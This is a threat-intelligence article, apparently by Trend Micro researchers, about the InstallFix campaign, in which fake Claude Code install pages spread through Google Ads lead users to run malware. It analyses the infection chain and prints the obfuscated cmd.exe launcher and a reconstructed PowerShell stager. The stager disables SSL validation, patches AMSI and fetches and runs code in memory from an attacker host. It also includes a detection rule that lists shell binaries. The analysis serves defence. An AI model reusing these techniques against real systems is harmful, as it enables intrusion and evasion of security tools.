{"id":60590,"date":"2026-05-05T00:00:00","date_gmt":"2026-05-05T00:00:00","guid":{"rendered":"urn:uuid:a676d6e1-a56a-85e6-8e92-b869cdbf9118"},"modified":"2026-05-05T00:00:00","modified_gmt":"2026-05-05T00:00:00","slug":"installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/installfix-and-claude-code-how-fake-install-pages-lead-to-real-compromise\/","title":{"rendered":"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/installfix_thunbnail:Large?qlt=80\"><!-- OneTrust Cookies Consent Notice start for trendmicro.com --><!-- OneTrust Cookies Consent Notice end for trendmicro.com --> <head> <meta charset=\"UTF-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\"> <meta name=\"description\"> <meta name=\"robots\" content=\"index,follow\"> <meta name=\"keywords\"> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\"> <meta name=\"template\" content=\"article1withouthero\"> <meta property=\"article:published_time\" content=\"2026-05-05\"> <meta property=\"article:tag\" content=\"cyber threats\"> <meta property=\"article:section\" content=\"research\"> <link rel=\"icon\" type=\"image\/ico\" href=\"\/content\/dam\/trendmicro\/favicon.ico\"> <link rel=\"canonical\" href=\"https:\/\/www.trendmicro.com\/en_us\/research\/26\/e\/installfix-and-claude-code.html\"> <title>InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise | Trend Micro (US)<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" 
href=\"\/etc.clientlibs\/trendmicro\/clientlibs\/trendmicro-core-2\/clientlibs\/header-footer.min.cc255fd374a145c2653503eb2da45983.css\" type=\"text\/css\">\n<link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.47ce60d92d94610907e7a2cbd6fbca69.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/26\/e\/installfix-and-claude-code.html\"><br \/>\n<meta property=\"og:title\" content=\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/26\/installfix_thunbnail.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"InstallFix and Claude Code: How Fake Install Pages Lead to Real Compromise\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/thumbnails\/26\/installfix_thunbnail.jpg\"> <meta name=\"user-country-code\" content=\"US\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.708113804004\"> <!-- Page Scroll: Back to Top --> <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a> <!-- \/* Data Layers *\/ --> <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" 
data-article-pageid=\"256818984\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"12.5\">\n<div class=\"article-details\" role=\"heading\" readability=\"45\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Cyber Threats<\/p>\n<p class=\"article-details__description\">Targeting multiple industries worldwide, the InstallFix campaign uses fake Claude AI installer pages to trick users into running malware that collects system information, disables security features, achieves persistence, and connects to attacker-controlled C&amp;C servers for additional payloads.<\/p>\n<p class=\"article-details__author-by\">By: Allixon Kristoffer Francisco, Gabriel Nicoleta, Jonna Santos, Mohamed Fahmy <time class=\"article-details__date\">May 05, 2026<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<div class=\"article-details__icons\"> <!--Add This--> <\/p>\n<div class=\"a2a_kit a2a_default_style\" data-a2a-icon-color=\"#717172\"> <a class=\"a2a_dd addthis_link\" href=\"https:\/\/www.addtoany.com\/share\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/share-more.svg\" class=\"svg-icon\" alt=\"Share\"> <\/a> <a class=\"a2a_button_print addthis_link\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch\/resources\/img\/printer.svg\" class=\"svg-icon\" alt=\"Print\"> <\/a> <\/div>\n<p> <!--Add to Folio--> <!--Subscribe--> <\/div>\n<\/div><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-lg-8 col-lg-push-2\"> <\/p>\n<div>\n<div class=\"richText\" readability=\"40.5\">\n<div readability=\"26\">\n<ul>\n<li><span class=\"rte-red-bullet\">The InstallFix campaign involves a social engineering 
attack that targets users searching for Anthropic\u2019s Claude AI by distributing malware through fake installation pages promoted via Google Ads.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Attackers leverage realistic, OS-specific installation instructions to trick users into running malicious PowerShell commands, which initiate a multi-stage infection chain involving mshta.exe, obfuscated scripts, and fileless payload delivery.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The campaign\u2019s infection chain includes advanced evasion techniques such as AMSI bypass, SSL certificate validation disabling, and victim-unique command-and-control URLs, complicating detection and remediation.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Telemetry from TrendAI Vision One\u2122 confirmed the creation of scheduled tasks for persistence and observed network traffic to attacker-controlled C&amp;C servers.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">The campaign targets organizations across the Americas, Asia Pacific, Middle East, and Africa (AMEA), and Europe, including industries such as government, electronics, education, and food &amp; beverage.<\/span><\/li>\n<\/ul>\n<p>In an era where artificial intelligence tools have become indispensable to modern workflows, threat actors are exploiting this dependency with alarming sophistication. The InstallFix campaign \u2014 also known as the Fake Claude Installer threat \u2014 represents a dangerous evolution in social engineering, weaponizing trust in legitimate AI platforms to deliver state-linked espionage malware. This report examines how adversaries are impersonating Anthropic&#8217;s Claude AI assistant, leveraging its 290 million monthly users to distribute malware through meticulously crafted fake installation pages. 
As organizations rush to integrate AI capabilities, understanding these deceptive tactics is no longer optional, but critical to survival in today&#8217;s threat landscape.<\/p>\n<p>As modern software installation often involves copying and running commands (for example, \u201ccurl-to-bash\u201d), attackers take advantage of this behavior by creating fake but realistic installation pages. These pages trick users into executing malicious commands, leading to malware infections.<\/p>\n<p>The threat is especially significant because it targets both developers and non-technical users who are increasingly using command-line tools, expanding the pool of potential victims.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>We identified attacks against targets in the following countries and industries:<\/p>\n<p><b>Regions<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Americas<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Asia Pacific, Middle East, and Africa (AMEA)<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Europe<\/span><\/li>\n<\/ul>\n<p><b>Countries<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Malaysia<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Netherlands<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Thailand<\/span><\/li>\n<li><span class=\"rte-red-bullet\">US<\/span><\/li>\n<\/ul>\n<p><b>Industries<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Electronics<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Education<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Food and beverage<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Government<\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.5\">\n<div readability=\"18\">\n<p>The fake install pages are distributed exclusively through Google Ads, specifically through sponsored search results that appear when users search for terms like &#8220;Claude Code&#8221; and &#8220;Claude Code 
install&#8221;. According to feedback from an MDR customer, a fraudulent landing page was visited by the user after clicking a sponsored link at the top of the search results; the user assumed the site was legitimate because it was promoted through Google Ads.<\/p>\n<p>The fake website includes a malicious command that uses PowerShell and MSHTA to execute and install a counterfeit Claude application on Windows systems and MacOS systems, though the buttons on the fake website seem to not work. The malvertising URL is designed to mimic a Google Ads link structure. The parameters <i>gar_source<\/i> and <i>gad_campaign<\/i> resemble advertising tracking fields commonly associated with Google Ads.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig01.png\" alt=\"Figure 1. Feedback from an MDR customer\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 1. Feedback from an MDR customer<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig02.png\" alt=\"Figure 2. A sponsored result appeared at the top of Google search results when the user was looking for the Claude installer\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 2. A sponsored result appeared at the top of Google search results when the user was looking for the Claude installer<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig03.png\" alt=\"Figure 3. 
Fraudulent landing page \"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 3. Fraudulent landing page <\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig04.png\" alt=\"Figure 4. The fake website with a malicious command for Windows systems\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 4. The fake website with a malicious command for Windows systems<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig05.png\" alt=\"Figure 5. The fake website with a malicious command for macOS systems\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 5. The fake website with a malicious command for macOS systems<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig06.png\" alt=\"Figure 6. Error page when buttons on the fake page are clicked\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 6. 
Error page when buttons on the fake page are clicked<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"29.395348837209\">\n<div readability=\"8.2674418604651\">\n<p>Our telemetry from <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform.html\" target=\"_blank\">TrendAI Vision One\u2122<\/a> showed that PowerShell on an endpoint invoked mshta.exe to download and execute a malicious payload (claude[.]msixbundle) from known malicious domain <i>download-version[.]1-5-8[.]com<\/i>.<b><\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig07.png\" alt=\"Figure 7. mshta.exe invoked to download and execute a malicious payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 7. mshta.exe invoked to download and execute a malicious payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig08.png\" alt=\"Figure 8. Outbound network connections and domain queries after user execution of malicious PowerShell commands\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 8. Outbound network connections and domain queries after user execution of malicious PowerShell commands<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig09.png\" alt=\"Figure 9. Obfuscated PowerShell code\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 9. 
Obfuscated PowerShell code<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig10.png\" alt=\"Figure 10. Deobfuscated PowerShell commands\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 10. Deobfuscated PowerShell commands<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>The deobfuscated PowerShell code performs the following commands:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Generates a unique ID for the victim machine<\/b><span> &#8211; To check if this has been infected<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Disables SSL certificate validation<\/b><span> &#8211; To trust any HTTPS certificate<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Decrypts\/decodes hidden strings<\/b><span> &#8211; Additional strings needed<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Attempts to tamper with internal .NET behavior<\/b><span> &#8211; Likely security bypass<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Downloads a payload from a remote server<\/b><span> &#8211; Another payload<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Executes it in memory<\/b><span> &#8211; For defense evasion<\/span><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"38.5\">\n<div readability=\"22\">\n<p>A TrendAI Vision One\u2122 detection filter, <b>MSHTA Spawning Windows Shell<\/b>, was triggered during the observed incident. 
It covers the critical stage where mshta.exe spawns a Windows shell process.&nbsp;<\/p>\n<p><b>What the rule detects<\/b><\/p>\n<p>The rule fires on <i>TELEMETRY_PROCESS_CREATE<\/i> events and covers two bilateral directions of the mshta.exe \/ shell process relationship:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Mshta as parent:<\/b><span> mshta.exe spawns any of: cmd.exe, powershell.exe, wscript.exe, cscript.exe, sh.exe, bash.exe, reg.exe, regsvr32.exe, or bitsadmin<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Mshta as child:<\/b><span> cmd.exe, powershell.exe, wscript.exe, cscript.exe, sh.exe, bash.exe, reg.exe, regsvr32.exe, or bitsadmin spawns mshta.exe&nbsp;&nbsp;<\/span><\/span><\/li>\n<\/ul>\n<p><b>Relevance to this campaign<\/b><\/p>\n<p>In the InstallFix incident, the rule triggered mshta.exe (processFilePath) spawning cmd.exe (objectFilePath) as part of the VBScript COM launcher stage. TrendAI Apex One\u2019s\u2122 Malware Behavior Blocking acted on the detection with a Terminate action, killing the malicious PowerShell child process (policy: FLS.ISB.4886T).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<p><span class=\"body-subhead-title\">Infection chain<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig11.jpg\" alt=\"Figure 11. Stages of the infection chain\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 11. 
Stages of the infection chain<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p><b>Stage 1: Initial Access &#8211; Google Ads Malvertisement (T1566.002 \/ T1583.008)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> Phishing via Google Ads sponsored results (T1566.002); Malvertisement (T1583.008)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Delivery:<\/b><span> Fake \u201cClaude Code\u201d install page served via paid Google search placement<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Lure:<\/b><span> Realistic install page with OS-specific commands; Windows and macOS variants present<\/span><\/span><\/li>\n<\/ul>\n<p>Attackers purchased Google Ads placements to intercept users searching for Claude Code. The sponsored result leads to a fake landing page styled as a legitimate install guide. Using the ClickFix social engineering pattern, the page presents an OS-specific command and instructs the user to run it, framing execution as a required installation step. 
On Windows, executing the command causes the browser or shell to invoke mshta.exe against the remote payload URL.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35\">\n<div readability=\"17\">\n<p><b>Stage 2: MSHTA Fetches and Executes ZIP\/HTA Polyglot (T1218.005)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b> <span>System Binary Proxy Execution: Mshta (T1218.005)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>File:<\/b><span> claude.msixbundle<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Host:<\/b> <span>download-version[.]1-5-8[.]com<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>File structure:<\/b><span> Valid ZIP archive with HTA payload appended at byte offset 882290 (ZIP\/HTA polyglot)<\/span><\/span><\/li>\n<\/ul>\n<p>The ClickFix command invokes mshta.exe with a remote URL pointing to claude.msixbundle. Despite its extension, the file is a ZIP\/HTA polyglot \u2014 the archive contains real Microsoft Bing packages bearing valid Microsoft Marketplace signatures, lending it a convincing appearance of legitimacy. The first 882290 bytes form a valid ZIP archive (VirusTotal identifies it as an Archive file with &#8216;PK&#8217; magic bytes), while mshta.exe reads the HTA content appended at the end of the file. 
This dual-format structure allows the file to pass as a benign package while mshta.exe executes the appended malicious HTA directly.<\/p>\n<blockquote readability=\"7\">\n<p>Process chain observed in telemetry:<br \/>&nbsp;&nbsp; explorer.exe<br \/>&nbsp;&nbsp;&nbsp;&nbsp; powershell.exe&nbsp; (user ran ClickFix command from fake install page)<br \/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mshta.exe&nbsp; https[:\/\/]download-version[.]1-5-8[.]com\/claude[.]msixbundle<\/p>\n<\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p><b>Stage 3: HTA VBScript Executes Silently &#8211; COM Shell Launcher (T1559.001 \/ T1059.005)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> Component Object Model abuse via Shell.Application (T1559.001)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> VBScript execution embedded in HTA (T1059.005)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Evasion:<\/b><span> Window resized to 0x0 pixels; no visible UI is presented to the user<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>COM Object:<\/b><span> Shell.Application | GUID: 9BA05972-F51F-4DE8-95A4-F561CC55EBC4<\/span><\/span><\/li>\n<\/ul>\n<p>The appended HTA executes VBScript silently inside mshta.exe. 
The script uses two named decoding functions to deobfuscate its payload before launching the next stage:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>DisplayEmailGnu()<\/b><span> &#8211; hex-decodes obfuscated strings embedded in the HTA<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>GetBiosDebian()<\/b><span> &#8211; base64-decodes the cmd.exe command<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Shell.Application COM object (GUID: 9BA05972-F51F-4DE8-95A4-F561CC55EBC4)<\/b><span> &#8211; executes the decoded command via ShellExecute<\/span><\/span><\/li>\n<\/ul>\n<p>The decoded command launched by the HTA:<\/p>\n<blockquote><p>cmd.exe \/v:on \/c &#8220;set x=pow&amp;&amp;set y=ershell&amp;&amp;call %windir%\\SysWOW64\\WindowsPowerShell\\v1.0\\!x!!y! -E &#8220;<\/p><\/blockquote>\n<p>The DispHTMLWindow2.resizeTo(0,0) call ensures the MSHTA window remains invisible to the user throughout execution. AMSI telemetry confirmed the VBScript executed within the mshta.exe process context and captured the decoded COM call sequence.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34\">\n<div readability=\"13\">\n<p><b>Stage 4: cmd.exe Reconstructs PowerShell Encoded Stager Executes (T1027 \/ T1059.001)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b> <span>Obfuscated Files or Information variable splitting + encoded command (T1027)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b> <span>Command and Scripting Interpreter: PowerShell via SysWOW64 (T1059.001)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Technique:<\/b><span> Disable or Modify Tools &#8211; AMSI patched via WriteInt32 (T1562)<\/span><\/span><\/li>\n<\/ul>\n<p>cmd.exe runs with delayed variable expansion (\/v:on) and uses the variable-splitting trick (set x=pow &amp;&amp; set y=ershell) to reconstruct the string &#8216;powershell&#8217; at runtime, evading static command-line detection. 
It then invokes the 32-bit SysWOW64 PowerShell binary with a UTF-16LE base64-encoded payload via the -E flag.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>The decoded PowerShell stager performs the following operations in sequence:<\/p>\n<ol>\n<li><b>Victim fingerprinting:<\/b> <span>Computes MD5(COMPUTERNAME + USERNAME), takes the first 16 hex characters in lowercase as a unique victim token ($nipple)<\/span><\/li>\n<li><b>SSL bypass:<\/b> <span>Sets [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}<\/span><\/li>\n<li><b>AMSI bypass:<\/b> <span>RC4-decrypts AMSI bypass strings (via custom GlobalJson and TenantId cipher functions) using key BWJFEesMEqRvjQbm, then writes 0x41414141 to amsiContext via [Runtime.InteropServices.Marshal]::WriteInt32 blinding AMSI for the remainder of the session<\/span><\/li>\n<li><b>Fileless payload retrieval:<\/b><span> Downloads Stage 4 from the victim-unique C&amp;C URL and executes it in memory via Invoke-Expression (IEX)<\/span><\/li>\n<\/ol>\n<blockquote><p># Decoded PowerShell stager logic (reconstructed from base64 telemetry)<br \/>&nbsp;<br \/># Step 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Victim fingerprint<br \/>&nbsp;$nipple = (Get-FileHash -InputStream([IO.MemoryStream]::new(<br \/>&nbsp;&nbsp;&nbsp;&nbsp; [Text.Encoding]::UTF8.GetBytes($env:COMPUTERNAME + $env:USERNAME)<br \/>&nbsp;)) -Algorithm MD5).Hash.Substring(0,16).ToLower()<br \/>&nbsp;<br \/># Step 2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SSL bypass<br \/>&nbsp;[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}<br \/>&nbsp;<br \/># Step 3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; AMSI patch (RC4 key: BWJFEesMEqRvjQbm)<br \/>&nbsp;# RC4 decrypts AMSI bypass strings -&gt; writes 0x41414141 to amsiContext<br \/>&nbsp;[Runtime.InteropServices.Marshal]::WriteInt32(&lt;amsiContext&gt;, 0x41414141)<br \/>&nbsp;<br \/># Step 4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Fileless stage-4 fetch 
and execute<br \/>&nbsp;$Filter = (New-Object Net.WebClient).DownloadString(<br \/>&nbsp;&nbsp;&nbsp;&nbsp; &#8220;https:\/\/$nipple.oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1&#8221;<br \/>&nbsp;)<br \/>&nbsp;IEX $Filter<\/p><\/blockquote>\n<p>The victim-unique subdomain (16-character hex derived from machine identity) means each host contacts a distinct URL, complicating bulk network-level blocking and potentially enabling per-victim payload customization by the actor.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p><b>Stage 5: Final Payload Fileless Execution (Not Recovered)<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><b>Source:<\/b><span> https:\/\/[nipple].oakenfjrod[.]ru\/cloude-91267b64-989f-49b4-89b4-984e0154d4d1<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>SHA1:<\/b><span> 811fbf0ff6b6acabe4b545e493ec0dd0178a0302 (file recovered from path; content execution not confirmed)<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>SHA256:<\/b><span> 2f04ba77bb841111036b979fc0dab7fcbae99749718ae1dd6fd348d4495b5f74<\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><b>Status:<\/b><span> Not fully recovered &#8211; TrendAI Apex One\u2122 terminated the process chain at Stage 3 before IEX completed<\/span><\/span><\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p>Claude.msixbundle.zip is the file downloaded from <i>hxxps[:\/\/]download-version[.]1-5-8[.]com\/claude[.]msixbundle<\/i>. File analysis confirmed the presence of a valid file signature, with the file header beginning with the \u201cPK\u201d identifier. 
This indicates that the file is a ZIP-based archive format, consistent with compressed package structures commonly used to distribute software or payloads.&nbsp;&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig12.png\" alt=\"Figure 12. The VirusTotal result showing that the file is a ZIP file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 12. The VirusTotal result showing that the file is a ZIP file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig13.png\" alt=\"Figure 13. The file header to the payload\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 13. The file header to the payload<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig14.png\" alt=\"Figure 14. The file signature for zip file containing \u201cPK\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 14. The file signature for zip file containing \u201cPK\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Based on the threat intelligence, this malware uses different file formats like mp3 to bypass security.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig15.png\" alt=\"Figure 15. 
The archive file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 15. The archive file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>When checking the archive file, it was found that the file contains a single archive. This archive appears to hold a normal file.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig16.png\" alt=\"Figure 16. The extraction of the file\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 16. The extraction of the file<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The contents of the file appear to consist of normal file components. At this stage, nothing obviously malicious or unusual is observed in the extracted files, and they resemble a standard application.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/26\/e\/installfix\/InstallFix_Fig17.png\" alt=\"Figure 17. The third stage of analysis\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 17. The third stage of 